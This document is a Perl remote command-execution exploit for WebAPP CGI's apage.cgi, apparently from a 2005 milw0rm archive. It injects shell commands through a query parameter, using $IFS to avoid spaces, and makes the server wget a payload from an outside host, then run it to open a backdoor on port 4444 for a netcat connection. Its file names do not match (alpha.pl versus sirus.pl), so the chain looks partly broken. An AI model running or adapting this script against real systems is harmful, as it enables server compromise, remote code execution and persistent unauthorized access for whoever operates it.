!/usr/bin/perl ################################################################# # T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m # ################################################################# # Remote C0mmand Executing Expl0it - For WebAPP CGI # #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v ); #E-Mail : Alpha_Programmer@Yahoo.com # Trapset_Sec@Yahoo.Ca #This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch #apage.cgi is Vulnerable in this M0ment !! # ################################################################# # Gr33tz To ==> AlphaST.Com , Crouz.Com , Simorgh-ev.Com And MH_P0rtal , Oil_Krachack # ################################################################# use IO::Socket; if (@ARGV < 2) { print "\n==============================================\n"; print " \n WebAPP CGI Exploit By Alpha_Programmer \n\n"; print " Trap-Set Underground Hacking Team \n\n"; print " Usage: \n\n"; print "==============================================\n\n"; print "Examples:\n\n"; print " WebApp.pl www.Host.com /cgi-bin/ \n"; exit(); } $serv = $ARGV[0]; $serv =~ s/http:\/\///ge; $dir = $ARGV[1]; $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; $cmde =~ s/ /"\$IFS"/ge; $req = "GET http://$serv"; $req .= "$dir"; $req .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n"; print $sock $req; print "\nPlease Wait ...\n\n"; sleep(3000); close($sock); $sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n"; $cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl"; $cmde2 =~ s/ /"\$IFS"/ge; $req2 = "GET http://$serv"; $req2 .= "$dir"; $req2 .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde2;echo\$IFS\"_T_\"| HTTP/1.0\n\n"; print $sock2 $req2; print "\n\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\n"; print "$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\n"; ### EOF ### # milw0rm.com [2005-05-20]